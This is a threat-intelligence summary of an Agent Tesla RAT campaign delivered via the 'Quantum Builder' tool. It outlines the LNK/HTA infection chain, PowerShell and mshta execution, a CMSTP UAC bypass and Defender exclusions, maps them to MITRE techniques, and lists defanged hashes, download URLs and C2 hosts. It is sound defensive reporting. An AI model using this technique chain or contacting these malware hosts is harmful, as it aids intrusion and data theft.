Threat Research

Agent Tesla RAT Delivered by Quantum Builder With New TTPs

Securonix

ThreatLabz details a campaign delivering Agent Tesla via a configurable “Quantum Builder,” which creates LNK, HTA, and ISO payloads to execute a multi-stage infection. The campaign uses obfuscated PowerShell, LOLBins, and UAC bypass techniques to obtain admin privileges and evade defenses. #QuantumBuilder #AgentTesla

Keypoints

  • The campaign delivers Agent Tesla (a .NET-based keylogger and RAT) using a builder called “Quantum Builder” sold on dark web marketplaces, with updates adding new infection chains using LNK and HTA payloads.
  • Infection chain starts with spearphishing containing a bundled LNK file (disguised as a PDF) inside a ZIP/GZIP container, leading to obfuscated PowerShell execution via mshta.
  • HTA files decrypt and load PowerShell loaders, then download the Agent Tesla binary and use CMSTP-based UAC bypass to run with administrative rights.
  • Techniques include in-memory PowerShell, XOR/Base64 decryption, AES/GZIP decryption, and LOLBins to evade detection and hide activity.
  • Agent Tesla capabilities in this campaign cover keylogging, form grabbing, clipboard hijacking, and FTP-based C2 communications, with data exfiltration toward attacker-controlled servers.
  • Variations of the infection chain include alternate LNK/HTA sequences and decoy files; the Quantum Builder is marketed as regularly updated to evade defenses.
  • Sandbox and IoCs from the campaign show specific LNK/HTA payloads, download URLs, C2 hosts, and Agent Tesla hashes, highlighting the ongoing use of Quantum Builder in the wild.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The novel infection chain commences with a spear phishing email which consists of a LNK File bundled as a GZIP Archive. “The novel infection chain commences with a spear phishing email … bundled as a GZIP Archive.”
  • [T1071] Application Layer Protocol – C2/receiver channel uses FTP for command and control: “FTP based CnC Communication”
  • [T1027] Obfuscated/Compressed Files and Information – LNK/HTA payloads decrypt via base64/XOR and decrypt routines before loading PowerShell. “Decrypts two base64 encoded strings … XOR decrypts both the decoded strings”
  • [T1059.001] PowerShell – In-memory PowerShell scripts and loader stages drive payload execution. “Execution of PowerShell scripts in-memory”
  • [T1218.005] Signed Binary Proxy Execution: Mshta – HTA files hosted on remote server are executed via mshta. “mshta.exe utility to execute a HTML Application (.HTA) file hosted on a remote server”
  • [T1059.005] VBScript – HTA file contains multiple junk VBScript functions used for malicious activity. “The HTML Application (HTA) File … contains multiple junk VBScript functions”
  • [T1548.002] Bypass User Account Control – CMSTP-based UAC bypass used to execute Agent Tesla with admin rights. “CMSTP UAC Bypass”
  • [T1027] (Deobfuscate/Decode) and [T1140] Deobfuscate/Decode Files or Information – Decryption routines and AES/GZIP decoding to obtain final scripts. “Decrypts the PowerShell loader … AES Decryption and GZIP Decompression”
  • [T1562.001] Impair Defenses – Windows Defender exclusions created during the infection. “exclude the AppData directory from Windows Defender”
  • [T1056.001] Keylogging – Agent Tesla capabilities include keystroke capture. “stealing personal data from Browsers, Mail Clients and logs keystrokes”
  • [T1036] Masquerading – LNK file disguised with a PDF icon to lure victims. “Malicious .LNK (Windows Shortcut File) file with a PDF icon”
  • [T1071.001] FTP-based C2 (Application Layer Protocol) – C2 communications via FTP server (C2 channel). “FTP based CnC Communication”

Indicators of Compromise

  • [File Hash] LNK hashes – 3edfa0cf3b7d54c24013e4f0019dba20, bb914889d5edc6b56c666d2e44e1a437 and 3 more hashes
  • [URL] HTA URLs – filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta, filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
  • [URL] Agent Tesla Download URL – filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe, 179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
  • [Hash] Agent Tesla hashes – d9433faddcaca526b26f713e27e2505f, 213ada506251c477480bd14ea5507bf3
  • [Hash] Agent Tesla hashes – 0ebb9d422f8e86458d8fa7f66fe1d0f1, 563fda5da81a5e7818d771222e81f6c4
  • [Domain] C2 – mail[.]thesharpening[.]com[.]au, ftp[.]qurvegraphics[.]com
  • [IP] C2 – 179[.]43[.]175[.]187
  • [IP] C2 – 179[.]43[.]175[.]187/puao/PO-M6888722[.]hta (example fragment showing remote host usage)

Read more: https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint